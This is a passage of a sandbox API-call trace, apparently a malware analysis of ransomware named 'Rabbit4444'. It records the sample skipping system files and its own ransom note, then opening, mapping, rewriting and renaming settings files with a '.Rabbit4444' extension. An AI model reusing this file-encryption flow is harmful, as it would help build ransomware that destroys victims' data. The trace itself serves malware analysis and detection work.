returned 4 [0058.050] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.050] lstrlenW (lpString=".sys") returned 4 [0058.050] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.050] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_syncsettings_syncaccessibility_toggle.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.050] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.050] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14936079176) returned 1 [0058.050] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1323) returned 1 [0058.050] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0058.050] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0058.050] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x830, lpName=0x0) returned 0x298 [0058.051] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x830) returned 0x70000 [0058.052] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.052] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0058.052] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.052] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0058.052] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.052] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0058.052] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.052] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0058.052] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14936321713) returned 1 [0058.053] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0058.053] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0058.053] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.053] CloseHandle (hObject=0x298) returned 1 [0058.053] CloseHandle (hObject=0x278) returned 1 [0058.053] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms.Rabbit4444") returned 202 [0058.053] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_syncsettings_syncaccessibility_toggle.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_syncsettings_syncaccessibility_toggle.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.054] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b298dfc, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3b298dfc, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x535, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms", cAlternateFileName="AAB020~1.SET")) returned 1 [0058.054] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.054] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.054] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.054] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms", lpString2=".") returned 1 [0058.054] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms", lpString2="..") returned 1 [0058.054] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms", lpString2="windows") returned -1 [0058.054] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.054] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.054] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms", lpString2="boot") returned -1 [0058.054] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.054] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.054] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms" | out: lpString1="AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms") returned="AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms" [0058.054] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.054] lstrlenW (lpString="AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms") returned 76 [0058.054] lstrlenW (lpString="Rabbit4444") returned 10 [0058.054] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.054] lstrlenW (lpString=".dll") returned 4 [0058.054] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.054] lstrlenW (lpString=".lnk") returned 4 [0058.054] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.054] lstrlenW (lpString=".ini") returned 4 [0058.054] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.054] lstrlenW (lpString=".sys") returned 4 [0058.054] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.055] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_syncsettings_syncbrowsersettings_toggle.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.055] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.055] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14936556539) returned 1 [0058.055] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1333) returned 1 [0058.055] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0058.055] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0058.055] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x840, lpName=0x0) returned 0x298 [0058.056] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x840) returned 0x70000 [0058.057] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.057] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.057] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.057] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0058.057] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.057] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0058.057] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.057] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.057] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14936807059) returned 1 [0058.057] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0058.057] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0058.057] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.058] CloseHandle (hObject=0x298) returned 1 [0058.058] CloseHandle (hObject=0x278) returned 1 [0058.058] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms.Rabbit4444") returned 204 [0058.058] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_syncsettings_syncbrowsersettings_toggle.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_syncsettings_syncbrowsersettings_toggle.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.058] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b62c681, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3b62c681, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x521, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms", cAlternateFileName="AA4EA6~1.SET")) returned 1 [0058.058] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.059] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.059] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.059] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms", lpString2=".") returned 1 [0058.059] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms", lpString2="..") returned 1 [0058.059] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms", lpString2="windows") returned -1 [0058.059] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.059] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.059] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms", lpString2="boot") returned -1 [0058.059] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.059] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.059] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms" | out: lpString1="AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms") returned="AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms" [0058.059] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.059] lstrlenW (lpString="AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms") returned 72 [0058.059] lstrlenW (lpString="Rabbit4444") returned 10 [0058.059] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.059] lstrlenW (lpString=".dll") returned 4 [0058.059] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.059] lstrlenW (lpString=".lnk") returned 4 [0058.059] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.059] lstrlenW (lpString=".ini") returned 4 [0058.059] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.059] lstrlenW (lpString=".sys") returned 4 [0058.060] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.060] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_syncsettings_synccredentials_toggle.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.060] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.060] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14937061145) returned 1 [0058.060] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1313) returned 1 [0058.060] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0058.060] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0058.060] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x830, lpName=0x0) returned 0x298 [0058.061] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x830) returned 0x70000 [0058.062] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.062] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.062] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.062] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0058.062] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.062] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0058.062] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.062] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.063] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14937328957) returned 1 [0058.063] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0058.063] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0058.063] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.063] CloseHandle (hObject=0x298) returned 1 [0058.063] CloseHandle (hObject=0x278) returned 1 [0058.063] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms.Rabbit4444") returned 200 [0058.063] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_syncsettings_synccredentials_toggle.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_syncsettings_synccredentials_toggle.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.064] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b81d4fa, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3b81d4fa, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x512, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms", cAlternateFileName="AAF46E~1.SET")) returned 1 [0058.068] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.068] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.068] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.068] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms", lpString2=".") returned 1 [0058.068] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms", lpString2="..") returned 1 [0058.068] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms", lpString2="windows") returned -1 [0058.068] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.068] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.068] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms", lpString2="boot") returned -1 [0058.068] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.068] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.068] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms" | out: lpString1="AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms") returned="AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms" [0058.068] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.068] lstrlenW (lpString="AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms") returned 69 [0058.068] lstrlenW (lpString="Rabbit4444") returned 10 [0058.068] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.068] lstrlenW (lpString=".dll") returned 4 [0058.068] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.069] lstrlenW (lpString=".lnk") returned 4 [0058.069] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.069] lstrlenW (lpString=".ini") returned 4 [0058.069] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.069] lstrlenW (lpString=".sys") returned 4 [0058.069] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.069] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_syncsettings_synclanguage_toggle.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.069] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.069] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14937973655) returned 1 [0058.069] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1298) returned 1 [0058.069] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0058.069] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0058.069] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0058.070] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0058.071] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.071] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0058.071] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.071] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0058.071] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.071] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0058.071] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.071] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0058.071] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14938215212) returned 1 [0058.071] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0058.071] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0058.072] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.072] CloseHandle (hObject=0x298) returned 1 [0058.072] CloseHandle (hObject=0x278) returned 1 [0058.072] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms.Rabbit4444") returned 197 [0058.072] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms" (normalized: 